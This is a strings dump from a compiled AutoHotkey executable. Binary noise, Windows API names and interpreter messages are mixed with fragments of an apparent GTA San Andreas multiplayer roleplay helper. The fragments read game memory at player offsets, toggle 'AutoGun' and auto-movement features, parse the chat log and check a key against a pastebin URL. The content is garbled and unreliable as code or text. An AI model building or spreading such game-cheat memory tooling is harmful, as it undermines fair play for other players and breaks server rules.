"VK SC", "\\$0H;", "TerminateProcess", "while Not FileExist(\"C:\\PA\\Logo.ico\")", "fD9$Gt", "l$xE3", "9k vq3", "AHK Keybd", "A_A\\][", "L9%8\\", "LoopFileSizeKB", "\\$HA;", "LcG`H", "!t$(H!t$ A", "InitializeCriticalSection", "LongDate", "v'H;}", "Input", "WININET.dll", "Mixer Doesn't Support This Component Type", "(D$@H", "EnvSet", "GetFullPathNameW", "VerQueryValueW", "v1H;s", ";\\$p|", "ANYCRLF)", ":?:/agun::", "#InstallKeybdHook", "`vbase destructor'", "\\P{Xan}", "The same variable cannot be used for more than one control.", "SUATAUH", "ReadProcessMemory", "(not the user's), because the keyboard hook isn't installed.", "@8*t<", "IsWindowEnabled", "SB_SetIcon", "`dynamic atexit destructor for '", "SHFileOperationW", "USWATAUH", "t4f9>t/H", "Too many declarations.", "!>6'Y", "D9%sW", "IsCharAlphaNumericW", "if(i==s-1)", "USVWAUH", "WinGetActiveTitle", "RCtrl ", "l$ H;", "Media_Next", "SetEnvironmentVariableW", "CATCH with no matching TRY", "\\P{Xsp}", "Saurashtra", "t$H8]", "USVWH", "APH+A@", "L$ UATAUAVAWH", " GTA RolePlay\")", "Duplicate label.", "tBfA;", "D$(+D$ fA", "D$ 9h", "- pure virtual function call", "A+G(L", "unknown option bit(s) set", "ApplicationFrameWindow", "GuiControl, 1:, M1, % ahk[i-2]", "T$ H+", "(|$PH", "(null)", "ˆ", "AUAVH", "ShortDate", "D+d$xL", "LoopFileSize", "if RegExMatch(GetChatLine(1), \"", "w%fE;", "8D$8t", "ShiftAltTab", "ControlList", "WATAUAVAWH", "SysTreeView32", "%s: %s object", "Sundanese", "IcC\\A", "GetSystemMetrics", "assertion expected after (?(", "`A^_[", "ProgramsCommon", "xac:=A_ScreenWidth / 2 -75", "A]A\\_^]", "[[[[[[[[[[[[[[[[[", "DeviceIoControl", ":T$Pr", "LButton", "D$`fD9'H", "@UVWH", "LeaveCriticalSection", "BlockInput, on", "InputHook", "GuiControl, 5:, pstatus, ", "~!fffffff", "NumpadRight", "L# E3", "`A^A]_", "WorkingDir", "Center", "l$(A^", "`local vftable'", "AutoHotkey2", "HKEY_CURRENT_USER", "CreateThread", "March", "TreeView", "v'H;w", "RegEnumValueW", "L$pA9", "w4t*H", "D9&tPH", "Create", "Bamum", "D$PE3", "#E8g#u", "C:f9A", "curren", "FileCopy", "VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV[[[[[[[[[[[[[[[[", "DeleteAll", "Can't Change Setting", "NewEnum", "8L$1H", "Count", "GetTextMetricsW", ".?AUIEnumVARIANT@@", "Capacity", "l$`L9c", "ScrollLock", "Unlock", "- Attempt to initialize the CRT more than once.", "Parameter #1 required", "D$8HcH", ">-u-fA", "_logb", ":\" id2)", "SysMenu", "REG_DWORD_BIG_ENDIAN", "November", "PixelGetColor", ": %id2%", "LoopRegName", "HcD$@", "mixerGetDevCapsW", "R6026", "@UVATAVH", "LineFile", "Volume", "DefaultTreeView", "D$PH9F", "RegOpenKeyExW", "#LTrim", "#Include", "Parameters must not be declared.", "&Pause Script", "ClipboardAll", "AppsKey", "SendEvent", "__Init", "%%%s%s%s", "?UUUUUU", "t$pL9c", "fD9:u", "DropDownList", "&Open", "ograve", "__unaligned", "REG_EXPAND_SZ", "IsUnicode", "GuiControl, 5:,pname, ", "Stopped", "Mc,$E", " A_A^A]A\\_^]", ".?AUIObjectComCompatible@@", "S>$hkDh$h>[2", "SetDefaultMouseSpeed 0", "Choice", "D9v(ua", "|$DE3", "Q5rHg,>", "?f`Y4", "ImageList_GetIconSize", "\"e?<<<<<0", "SHIFTDOWN", "T$0E3", "fA9D$", "EnumFontFamiliesExW", "The leftmost character above is illegal in an expression.", "SUVWATH", "UWATAUAWH", "While colSettings[objOSItem]", "Duplicate hotkey.", "A]A\\^]", "@VATAUAVAWH", "Common", "zc%C1", "if RegExMatch(rps, \"\\Q$\\Eid\", out)", ":?:/hud::", "\\P{L}", "@UAUH", "__Handle", "Level", "WinWaitClose", "A_Args", "u0f9C", "SizeNS", "T$p<\"", "])6M>&", "Hotkey", "L$PfA", "@UVATH", "gui, 4:add, text, x0 y0 w150 cRed vapt +Center , AutoPT", "L$ E3", "Atilde", "sendchat(\"/patrul\")", "n03>Pu", "Up/Dn", "l$0fD", "9uu2H", "wKfffff", "WriteProcessMemory", "D$hE3", "H;59t", "if open", "Missing \")\"", "IcqHH", "AdjustTokenPrivileges", "SendMessageTimeoutW", "FileTimeToSystemTime", "K&>.yC", "Parameters of hotkey functions must be optional.", "H;Y(~!H", "L$xfA", "D|pf9D$p", "KillTimer", "set cdaudio door %s wait", "T$\\D;", "rp := RegExReplace(rp, \"\\Q$\\Eyear\", time.y)", "xap:=A_ScreenWidth - 250", "FileCreateShortcut", "RegWrite", "t>fff", "|b=})>", "ATAVH", "D8y#u", "d$`E3", "@SUAVH", "`eh vector vbase copy constructor iterator'", "gui, 2:font, s16", ")t$`L", "MonitorName", "ControlFocus", "&Variables and their contents", "C<9C8u(", "InternetCloseHandle", "A_A][]", ".?AVEnumerator@Object@@", "u'ffffff", "-()[]{}:;'\"/\\,.?!", "D8k#u", "too many forward references", "f#^0f", "@8s#u", "Unexpected \"]\"", "VS_VERSION_INFO", "N>O=I9", "\\$XE3", "tM@8s#u", "SplashTextOff", "\"%s\" is not a valid key name.", "USATAVAWH", "\"\"\"\"&*.2666::>>>CCCCCHMMVV$", "status cd mode", ".?AVBoundFunc@@", "FileCopyDir", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "GetClassLongPtrW", "@SAVAW", "xapt:=A_ScreenWidth / 2 - 225", "e@A_A^A]A\\_^]", "D9-s}", "r&D8g", "malformed number or name after (?(", "f98u,A", "Telephone", "D$ E3", "open %s type cdaudio alias cd wait shareable", "-----", "`dynamic initializer for '", "REG_RESOURCE_REQUIREMENTS_LIST", "\"%-1.300s\"", "SetCurrentDirectoryW", "D9uPL", "A;\\$ ", "false", "WindowFromPoint", "|$ ATAUAVAWI", "1#SNAN", "c0&>`", "FileRead, file, %A_MyDocuments%\\GTA San Andreas User Files\\SAMP\\chatlog.txt", "LoopFileAttrib", "L?UUUUUUU?", "LcJDLcB@H", " A^A]A\\_^", "t$ ATH", "?.uI3", "|$ Hc", "GetDriveTypeW", "Z\\>z8", "DOMAIN error", "StartMenu", "@SAUH", "BSR_UNICODE)", "ThenPlay", "l$ VWATAUAVH", "xppwpp", "fD9:r", "\\c at end of pattern", "EndKey", "An exception was thrown.", "SHGetDesktopFolder", "Headphones", "GuiControl,10:+cRed +Redraw, StatusAC", "@\"=cJ", "fD9?u", "CD;T$X", "|$HfA", "[[[[[[[[[[[[[[[[[[[[[[VVVVVVVVVVVVV", "D$$fE", "fD9t$@u", "F0HcH", "\\$ VWATAUAWH", "L$TfA", "(t$pH", "f9lL0u ", "d$X9YP~13", "fA9D{", "68Y#u", "Deref", "global", "d$PE3", "9E v-H", "msctls_progress32", "Script info will not be shown because the \"Menu, Tray, MainWindow\"", "D$0Hc", "iniread, name, rp.ini, settings, name", "iniread, org, rp.ini, settings, org", "E8|$(tmD8=0j", "D;l$8", "u*D9%a,", "EnumChildWindows", "D$PH#", "print", "HA^A]A\\_^[", "Icirc", "WIN32_NT", "/2GG>!B", "SetTimer, omenu, 1", "H;W }yA", "<7H;|$xr+H", "ReadOnly", "WCreateProcessWithLogonW.", "CreateMenu", "return prread(getprocessid(), player + 0x548, \"float\")", "return processHandle", "gui, auth:Destroy", "RWINUP", "MonitorWorkArea", "L# Hc", "\\P{Nd}", "@8n(t5@8-", "u#HcMP", "WantCtrlA", "#KeyHistory", "Program Manager", "<$iu.H", "WaitClose", "if(line:=findline(\"", "StringLower", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "This local variable has the same name as a global variable.", "if !apt", ";^ r\"H", "Mb@A\"", "EnvDiv", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "T$8E3", "OwnDialogs", "E&xit (Terminate Script)", "v'H;{", "t$0Hc", "D$`fD", "?7zQ6$", "|L.\\u", "if !RegExMatch(GetChatLine(0), \"", "AhkPath", "Serial", "Select Folder - %s", "MoveDraw", "if(GetKeyState(\"S\", \"P\"))", "if(GetKeyState(\"D\", \"P\"))", "#MaxThreadsBuffer", "H;G8u", "cmenu() {", "Position", ";,u-ff", "t[I)l$8A", "`vector copy constructor iterator'", "t$`D8", "GetUserNameW", "A_A^A\\_]", "`A_A^A]A\\_^]", "Parameter #1 must not be blank in this case.", "fD93u", "D$l+D$dE8", "L$xHcT$X", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "AutoHotkey v1.1.37.01", "E7 %04X", "DeleteFileW", "FileSelectFolder", "9D$XA", "igrave", "RegDeleteValueW", "MinSendLevel", "Object.Enumerator", "The script was not reloaded; the old version will remain in effect.", "A_A^A]A\\[", "FileGetTime", "%s (%d) : ==> %s", "Buhid", "Glagolitic", ")t$`tz", "gui, 1:add, text, cWhite vM2 x0 w250 Center, % ahk[i-1]", "Green", "Gui, 2:show, x%xac% y%yac% w150 NoActivate, ", "<>H;|$xr+H", "InternetReadFileExA", "DrawIconEx", "Runtime Error!", "UNTIL with no matching LOOP", "|$PE3", "- not enough space for locale information", "SUVWAUAWH", "StatusAC:=!StatusAC", "szlig", "{ ATH", "ABCDEFGHIJKLMNOPQRSTUVWXYZ", "Invalid Gui name.", "@>%>b", "SizeofResource", "L$PfH", ": %shp1%", "WorkerW", "return i", "AppData", "HeapQueryInformation", "different names for subpatterns of the same number are not allowed", "two named subpatterns have the same name", "<>H;}", ".?AVExprOpFunc@@", "gui, 5:hide", "rp := RegExReplace(rp, \"\\Q$\\Ereason\", reason)", "The InputBox window could not be displayed.", "user32.dll", "EndDialog", "Right", "D8mju", "Until", "@USVWATAVAWH", "SHIFTUP", "Clone", "\\$PE3", "|$@H;", "C\"$\"<", "f9*t8", "Focused", "DriveGet", "#HotkeyInterval 1000", "CreateRoundRectRgn", "MsgBox, ", "gui, 5:add, text, x10 y80 w250 cWhite vpid, ", "Duplicate parameter.", "GetQueueStatus", "A;}$}", "StringMid", "A9t$ ", "|$HE8", "NoMainWindow", "@8t$ ", "Modifiers (Hook's Physical) = %s", "\\$ UWATH", "CWD>~3", "FormatMessageW", "divide", "[[[[[[[[[[[[[", "XA_A^A]A\\_^][", ": %nick2%", "#Delimiter", "Modifiers (GetKeyState() now) = %s", "Balinese", "thorn", "vSIc@,H", "advapi32", "The following %s name contains an illegal character:", "ERCPt", "\\$8fD", "A+C0fE", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "fD9t$b", "CreateMutexW", "#MaxHotkeysPerInterval", "Function name too long.", "[[[[[[[[[[[[[[[", "Round", "Label", "|$8fA", "@SVAVAWH", "v%H;}", "{Blind}", "A9t$X~-A", "A0I9B0", "H+D$@E", "<4H;}", "H;0t,", "d$0E;", "pfD9f", "HeapReAlloc", "OnOff", "vXI;\\$", "L9X8t", "#IfWin", "fffffff", "NotifyNonText", "ƒ", "L$0E3", "`+!]?", "v(H;{", "VarSetCapacity(buf, numBytes, 0)", "Unregistered window class.", "D$ fE", "ahk_default", "%sLeft", ":u!f9", "Gui, 1:Destroy", "Volume_Up", "ShellExecuteExW", "SB_SetText", "ahk_group", "%s%s%s", ".?AVObjectBase@@", "Ctrl+H", "D9J(tVH", "A control's variable must be global or static.", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "Ctrl+L", "fD98u", "Style", "+f)>0'", "v'L;g", "GetCursorPos", "Local", "close cd wait", "RegQueryInfoKeyW", "Environment", "IfNotExist", "InsertAt", "Avestan", "gui, 2:hide", "Integer", "<$-Hc", " !\"\"#$%&'((()*+,-./0123456789:;<=>?@AABCDEFGHFIJKKALAAM", " (.*)\", id)", "%sRight", " ", "FlsFree", "Missing comma", "InternalName", "Locale", " A_A^A]_^][", "D$ H#", "WinGetActiveStats", "L$ Hc", "PRUNE", "QSoundPan", ".?AVTextStream@@", "(;} r", "l$`tB", "_oD>Kg", "unrecognized character after (? or (?-", "Media_Stop", "The AltTab hotkey \"%s\" must have exactly one modifier/prefix.", ".?AUIObject@@", "LoopField", "STILL WAITING (%0.2f): ", "RichC", "?kxG2)", "TTTTT", "Custom", "|$@E3", "k-hook", "This character is not allowed here.", "ScriptHwnd", "&Web Site", "Line#", "t$0tP", "H+D$`H", "bad exception", "CoUninitialize", "GuiControl, 3:+cRed +Redraw, agun", "C!yTH", "Function recursion limit exceeded.", ".text", "Embed Source", "D$8;C s", "XButton2", "WinShow", "ThisMenuItemPos", "IconHidden", "z\\uZf", "fD; s H", "if(GetKeyState(\"W\", \"P\"))", "ListLines", "The program will exit.", "w(tBH", "Menu does not exist.", "v9H;s", "t$ E3", "0A^A]_", "H+M0x", "Insert", "internal error: unknown opcode in find_fixedlength()", "btnstart:", "L$hA;", "NIc{$I", "RegCreateKeyExW", "FileRead", "yZZZ[[b", "fD9%@", "L$XE3", "IsHungAppWindow", "shHcD$XH", "__stdcall", "}u4fA", "v!H;o", "WIN_8.1", "v$H;k", "joyGetDevCapsW", "™", "unrecognized character follows \\", "SetBatchLines -1", "Xdigit", "L$xt9@", "DialogBoxParamW", "ComObjType", "@A]A\\_^]", "(A]A\\_^][", "<$+u>I", "H9\\$puv", "L$xE3", "gui, 6:hide", "f92t+H", "comctl32", "t#D85#T", "A|", "NumpadDiv", "not contains", "PA]A\\_", "SHELL32.dll", "m-hook", "Invalid `%.", "|$BM;", "TranslateMessage", "1#INF", "Synth", "OSType", "USVATAUAVAWH", "Cypriot", "rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr", "sendinput {s down}", " (preempted: they will resume when the current thread finishes)", "@USWATH", "GetFileVersionInfoSizeW", "CreateProcessW", "BETWEEN requires the word AND.", "u.D8-", "D$xH;", "omenu() {", "%s%c%s%cAll Files (*.*)%c*.*%c", ".?AUIUnknown@@", "ActivateKeyboardLayout", "t$`L9c", ": .......", "9]X~)3", "Backspace", "L9+u^D8k", "RWINDOWN", "status AHK_PlayMe mode", "Radio", "Report", "%u.%u.%u", "if !DllCall(\"CloseHandle\", \"Ptr\", processHandle, \"UInt\") && !result", "k D9kX~,", "WinMenuSelectItem", "(see #MaxHotkeysPerInterval in the help file)", "0A_A\\_", "Files", "Unsupported parameter default.", "remed:=1", "AddClipboardFormatListener", "\\$ E9c", ".?AVRegExMatchObject@@", "Error at line %u", "SetMenuInfo", "Line Text: %-1.100s%s", "d$PfE;", "TTS(text) {", "LoopFileTimeCreated", "ThenEvent", "base.__Init()", "D$,+D$$f", "ProductVersion", "v/L;w", "SetStoreCapslockMode", "td@8o#u", "EndChar", "L$BfA", "StringCaseSense", "Prompt", "L9t$8u", "^RfN>", "A_A]A\\_^]", "ugrave", "xf9t$ taH", "argument is not a compiled regular expression", "clsid", "Friday", "iniread, tag, rp.ini, settings, tag", "h>1my", "acuff() {", "an argument is not allowed for (*ACCEPT), (*FAIL), or (*COMMIT)", "ComObject", "ClassOverwrite", "Caret", "M(H;M rFH", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "MsgBox", "AltTabMenu", "loop, parse, cmd, `n", "(;_ r", "Blank group name.", "uSfE9", " ffffff", "L$Pffff", "GetClassInfoExW", "LCtrl", "VScroll", "d$0E3", "CreateFileW", "MinParams", "Too many params.", "D8\\$1tID9", "u&D95", "f97t%L", "A^A]A\\_^[]", "|$T.|BH", "Gui, 1:+ToolWindow -Caption +Owner +AlwaysOnTop +E0x20", "CoInitialize", "Too many fonts.", "TimeIdlePhysical", "u,fA97u&", "StereoEnh", "xA_A^A]A\\_^][", "RemovePropW", "Gui, 4:show, x%xapt% y%yapt% w150 NoActivate, ", "gui, 3:add, text, x0 y0 w150 cRed vagun +Center , AutoGun", "Gui, 2:+ToolWindow -Caption +Owner +AlwaysOnTop +E0x20", "- Attempt to use MSIL code from this assembly during native code initialization", "KeyDurationPlay", "if(GetKeyState(\"A\", \"P\"))", "u7D9-F_", "Picture", "Invert", "%s%s:%s %-1.500s", "GDI32.dll", "Brahmi", "`.rdata", "gui, 6:Destroy", "Progman", "D$PM98u", "t%I+WHA", "L$0H+", " Hct$p3", "Text Documents (*.txt)", "August", "opengta()", "Transform", "Buttons", "COMDLG32.dll", "fD9.u", "GnfA9", "Write", "- not enough space for _onexit/atexit table", "missing ) after comment", "GetSystemTimeAsFileTime", "Could not create window.", "y0%uT", "l$`fD", "|$8H+", ")|$Pf", "L$8A+", "\\$@tQ", "RAlt ", "OutputDebug", "^8U)zj", "SendLevel", "T$Ff;", "autogun:=!autogun", "fD9l$@", "fD91u", "Array", "REG_LINK", "gui, 6:show, NoActivate", "u=9=`|", "GetClientRect", "plusmn", "n]?iJ", "ahk_dlg", "t$H;|$P", "H(H9J(u", "`vector deleting destructor'", "AttachThreadInput", "diouxX", "D$`H;", "ThisMenuItem", "Phags_Pa", "Specifically: %-1.100s%s", "|$ Hi", "t0fD9", "if(i==1)", "D$pE3", "D$hL;", "v-H;n", "H;B8}", "ADVAPI32.dll", "Choose", "MinimizeBox", "if RegExMatch(WebRequest.responseText, key)", "F|McF|E3", "gui, 3:color, Black", "StatusBarWait", "InternetOpenUrlW", "RegisterCallback", "Blank parameter", " H", "Trans", "GetFileSize", "Eacute", "Yellow", "A>l$/", "t$X+L$pH", "D8%aJ", "Kannada", "u:m", "U(A;F }HH", "RemoveClipboardFormatListener", "t(fff", "GdipCreateHBITMAPFromBitmap", "Launch_App1", "MouseReset", "oI>O7", "ScriptDir", "fD9`\"(5", "MouseGetPos", "EnumDisplayMonitors", "IsPaused", "?)tnH", "Expected \":=\"", "@SUVWATAUAVAWH", "Digital", "<&H;}", "PA^A]A\\_^][", "LoopReadLine", "Ctrl+V", "A]A\\_", "l$ VWATH", "HcL$0H", "D;+t1", "Execute()", "x_^][", "Kayah_Li", "ImageList_Create", "rp := RegExReplace(rp, \"\\Q$\\Emonth\", time.m)", "u4A;v }", "ldexp", "guihide() {", "UseEnv", "VarSetCapacity", "Script lines most recently executed (oldest first). Press [F5] to refresh. The seconds elapsed between a line and the one after it is in parentheses to the right (if not 0). The bottommost line's elapsed time is the number of seconds since it executed.", "gettime() {", "UpDown", "L9d$xu", "fD9$Ou", "t&D8Z", "?{Q}<", "UATAUAVAWH", "AltSubmit", "stopped", "L$@;|", "Process Priority, , A", "NumpadDel", "Unreachable", "fD92t}H", "Hc@\\D", "Tabstop", "9xT~63", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "D956P", "RegEx", "REG_FULL_RESOURCE_DESCRIPTOR", "tjD9t$DuC", "TrayTip", "GetKey", "A_A^A\\[]", "L$xf92", "<[cZUg^>", "mixerClose", " (.*)\") == -1)", ".?AVCStringWCharFromChar@@", "%-15s", "{Blind}%s%s{%s DownR}", "Local Variables for %s()%s", "VVVVVVVV", "ActiveX", "|$xH;", "SetMenuDefaultItem", "GetPixel", "Logoff", "GetLastInputInfo", "t=D8w", "v(H;}", ":?:/q::", "GuiEvent", "RegClass", "NumpadMult", "gfffA", "@VATAVAWH", "Javanese", "MoveFileW", "SetTitleMatchMode 2", "d$XE3", "D$DHc", "A_A^A]A\\_^[", "AppStarting", "v%L;g", "YearMonth", "if findline(\"", "loop, parse, allrp, `n", "CorExitProcess", "- not enough space for thread data", "*D$@f", "@A]A\\_", "[[[[[[[[[[[[[[[[[[[[[", "AltTab", "Floor", "MouseClickDrag", "WATAVH", "tN @m", "FillRgn", "xA_A^A][", "RtlPcToFileHeader", "This variable has not been assigned a value.", "0A\\_^", "getprocessid(){", "MessageBeep", "An environment variable is being accessed; see #NoEnv.", "M8fD9!u", "FileGetSize", "IsOptional", "`eh vector constructor iterator'", "hHmst", "operator", ".?AVMetaObject@@", "Could not extract script from EXE.", "NumpadDown", "Old_South_Arabian", "d$0fA9E", "HcHTH", "D8h(u", "USVWATAVH", " A]_^", "Syloti_Nagri", "T$hI;", "D8l$0t", "SendInput /me ", "CompanyName", "%0.2f", "u(I;t$0}!H", "WinMinimizeAllUndo", "ExitReason", "tIH9=}", "R6019", "|$ AT", "SetEndOfFile", "+h->|", "This DllCall requires a prior VarSetCapacity.", "ObjectLink", "Numpad0", "\\$8+\\$0f", "|$PM3", "GetGUIThreadInfo", "FD8K#u", "H;L$0vR", "url:=\"https://pastebin.com/raw/04TKQkE1\"", "v0H;s", "RunAs", "Invalid class name.", "REG_QWORD", "”", " (.*)\\Q[\\E(.*)\\Q]\\E\", id)", "ThisHotkey", "ToolTip", "yacute", "D$@D8h", "index := A_Index - line", ")t$0f", "fE97M", "ExitWindowsEx", "Invalid function declaration.", "GetCapacity", "D9T$p", "GetIconInfo", "[[[[[[[", "RunAs: Missing advapi32.dll.", "pA]A\\_^[", "EnfA9", "tJE8h", "%s%s %s %s", "Invalid single-line hotkey/hotstring.", "[[[[[[VVVVVVV[[[[[[[[[", "MainWindow", "TabRight", "open:=1", "R6010", "D8E=t", "d$Pff", "CreateDirectoryW", ".xJ>Hf", " H;{0}", "H;}0r", "FormatTime", "IconNumber", "A^A\\]", "L$ USWH", "IsSuspended", "\\$XI;", "L$P$=", ":qt f", "sleep 20", "Rename failed (name too long?).", "RawWrite", "VATAUAVAWH", "SetTitleMatchMode Fast", "R6030", "Case/Default must be enclosed by a Switch.", "PtInRect", "f98uPH", "Class may be overwritten.", "bbbbb", "Unknown", "L;-~3", "MultiByteToWideChar", "@t&Ic", "USWAVH", "D$XfD9 t", "__pascal", "t$8E3", ".?AUIServiceProvider@@", "|$ H;", ":?:/relog::", "? StrGet(&buf, numBytes)", "Expression too long", "SizeWE", "ComEvent", "Clipboard", "\\$XfA9m", "Background", "l$0E3", "ReadFile", "Link Source", "u2D9%", "u_f9E", "Expand", "0x%08X - ", "&User Manual", "unrecognized character after (?P", "T$0H+", "NO_START_OPT)", "msctls_statusbar321", "Destroy", "epA_A^A]A\\]", "81u+fA9h", "The current thread will exit.", "kE>fvw", "Missing \")\" before \":\"", "patrol() {", "0123456789ABCDEF", "MinIndex", "D8|$8t", "cntrl", "waveOutGetVolume", "SHGetMalloc", "Note: To avoid this message, see #SingleInstance in the help file.", "C HcC A", "D8c#u", "IfGreater", "9IcK$H", "Malayalam", "Browser_Forward", " Specifically: %s", "iacute", "Nonexistent menu item.", "gdiplus", "A^A\\_", "bad allocation", "ToolWindow", "u5fE9L$", "value", " A_A^A\\_]", "IcF H", "rQf99t'H", "l$ WH", "Match", "Modify", "<+u-A", "GetTimeFormatW", "Elapsed", "fD9ly", "@UWAVAW", "v(L;w", "[[[[[[[[[[[[[[[[[[[[[[[[[[", "USWATH", "Browser_Search", "v'H;o", "v%H;s", "I)l$ E", "040904b0", "GetMessagePos", "IconTip", "T$TA;", "ifWinNotActive GTA:SA:MP", "A^A]_^]", "z?aUY", "\\$ VATAU", "WIN_XP", "PCRED", "WinClose", "IfLessOrEqual", "group", "RtlVirtualUnwind", "l$ WAUAVH", "` AUH", "USWATAUAWH", "Property", ")>6{1n", "@8{^tY9{@", "SetDlgItemTextW", "Finally", "ahk_autosize", "|$8H;", "L$&H;", "8ut H", "N0Wl", "TimeIdleMouse", "Missing \"{\"", "9uuCL", "/ErrorStdOut", "u*A8|$", "*.txt", ";\\$ |", "H[>", "rKLcM", "t$@Hc", "SelectObject", "TUUUU", "8qux3", "return prread(getprocessid(), player + 0x540, \"float\")", "Component Doesn't Support This Control Type", "uNffffff", "Microsoft Visual C++ Runtime Library", "fD9/H", ".D8mjt", "t0H95", "WideCharToMultiByte", "LookupPrivilegeValueW", "D$@E:", "t$8fA", "@Qm6t", "FileReadLine", "ELSE with no matching IF", "ImageList", "LoopRegTimeModified", "Multi", "Y>kX>M", "fD91t", "0A^A]A\\_^", "L$ UVWATAUAVAWH", "InStr", "COMCTL32.dll", "Hebrew", "recursive call could loop indefinitely", "IsByRef", "fD9!t", "WinDelay", "MinMax", "t$0H;{8|.H", "EnumWindows", "D$@H+", "This class definition is nested too deep.", "(;s r", " delete[]", "If !WinActive(\"GTA:SA:MP\") {", "`udt returning'", "L$$fE", "H;Q wwf", "fJBGo", "%s\\%s", "Syntax error in class definition.", "Z HcJ`H", "L$pH+", "Cross", "@SUAUAV", "ToggleEnable", "8A_A]", "NowUTC", "GetCursorInfo", "GetCurrentThreadId", "MouseMove", "SetFileAttributesW", "return -1", "RemoveDirectoryW", "fD97t", "Progress", "MouseDelay", "extends", "AddRef", "CopyFileW", "FormatFloat", "SetTimer", "Gui, 3:show, x%xag% y%yag% w150 NoActivate, ", "StringTrimLeft", "Hotstring", "u(fff", "DestroyAcceleratorTable", "if StatusAC", "return output := RegExReplace(RegExReplace(A_LoopField, \"U)^\\[\\d{2}:\\d{2}:\\d{2}\\]\"), \"Ui)\\{[a-f0-9]{6}\\}\")", "XA_A^", "gui, 4:color, Black", "; ", "8L$0H", "Tamil", "D$\\}D", "f9lT0u%", "?:u8H", "l$XfE", "@SVWATAUAVAWH", "LoadLibraryW", "SetLastError", "GetMenuItemInfoW", "Start", "aacute", "GetSysColor", "@UWAT", "ToUnicodeEx", "?!5WOo", "L$`H3", "utHc]", "Katakana", "RShift ", "toM;e", "ReleaseDC", ":}u\"A", "?)uxI", "H+L$(H", "FlushFileBuffers", "t$HA+", "GetTempPathW", "ImageSearch", "BE;CX|", "LcCxH", "NumpadEnd", "mciSendStringW", "USWATAUAVH", "tED8k", "GetClipboardFormatNameW", "u5fE9|$", "8ERCPu", "Hotkeys/hotstrings are not allowed inside functions.", "Combo", "\"%s\" is not allowed as a prefix key.", "\\$XL;", "@SUWATAVH", "@A^][", "@8l$8t", "A]A\\^", "IfWinNotActive", "L$@E2", "Modifiers (Hook's Logical) = %s", "CreateStreamOnHGlobal", "@\"=c(", "A_A]^[", "L$XfD9!u", "ImageList_AddMasked", "Permit", "GdiplusStartup", "USVWATAUH", "H;;tCH", "@SUWH", "t,f98t'H", "l$H@8~xug", "BarBreak", "GuiControl, 4:+cGreen +Redraw, apt", "GetChatLine(line:=0) {", "u_fE9", "Saturday", "<7H;} r+H", "D+API", ")|B?d!", "@A^A\\]", "IfNotEqual", "RegExMatch", "WantF2", "FreeEnvironmentStringsW", "Lj[;>", "L$qfD9+t}H", "L$099u", "SendInput /r [%tag%]%A_Space%", "CreateStatusWindowW", "CreatePopupMenu", "NumBatchLines", "#HotkeyInterval", "t(H+D$`L", "(A_A^A\\^", "D$H9D$@t", ".?AVEnumBase@@", "HcH/", "XButton1", "h`H9up", "A80uII", "NOTE: Only the script's own keyboard events are shown", "D$PH9D$p", "tgE8h", "A_A^A]A\\^", "REG_BINARY", "ListView", "L9=J-", "The maximum number of MsgBoxes has been reached.", "bb[[bb", "GetModuleFileNameExW", "HScroll", "HA_A^A]A\\_^][", "IsWindow", "xh:=A_ScreenWidth - ( A_ScreenWidth / 4 )", "fD93t93", "Combobox", "v6H;s", "@80t)H", "D$p@2", "H;K0u", "URLDownloadToFile", "eEfgGaA", "D9B(tBH", "RtlUnwindEx", "Topmost", "A_A]A\\^]", "SetWindowLongPtrW", "Numpad5", "tZL;%,&", "FileExist", "-+0 #", "Tai_Tham", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "CDRom", "uNf9C", "L$XIc", "%04d%02d%02d%02d%02d%02d", "Action: <%-0.400s%s>%s", "tnLcV", "D8n#u", ")t$ H", "WheelDown", "Global variables must not be declared in this function.", "PA]_]", 